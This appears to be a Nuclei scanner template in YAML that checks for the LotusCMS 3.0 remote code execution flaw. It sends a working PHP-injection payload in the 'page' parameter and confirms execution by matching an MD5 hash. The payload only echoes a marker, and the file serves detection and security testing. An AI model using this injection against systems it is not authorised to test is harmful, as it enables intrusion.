43 lines
1.2 KiB
YAML
43 lines
1.2 KiB
YAML
id: lotuscms-rce
|
|
|
|
info:
|
|
name: LotusCMS 3.0 - Remote Code Execution
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: |
|
|
LotusCMS 3.0 is susceptible to remote code execution via the Router () function. This is done by embedding PHP code in the 'page' parameter, which will be passed to a eval call and allow remote code execution.
|
|
reference:
|
|
- https://github.com/Hood3dRob1n/LotusCMS-Exploit
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cwe-id: CWE-77
|
|
metadata:
|
|
max-request: 2
|
|
tags: lotuscms,rce
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/index.php"
|
|
- "{{BaseURL}}/lcms/index.php"
|
|
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
body: |
|
|
page=index');${system('echo lotuscms_rce | md5sum')};#
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "38ee63071a04dc5e04ed22624c38e648"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502210080195f8997e2125d05b031fd5c31d069c08dde12cb560f1f35f4ae092cd7c78c02207df5154b26e14c573918e75933b5d0436d849c6a4808e31e789b5aecee99ce35:922c64590222798bb761d5b6d8e72950
|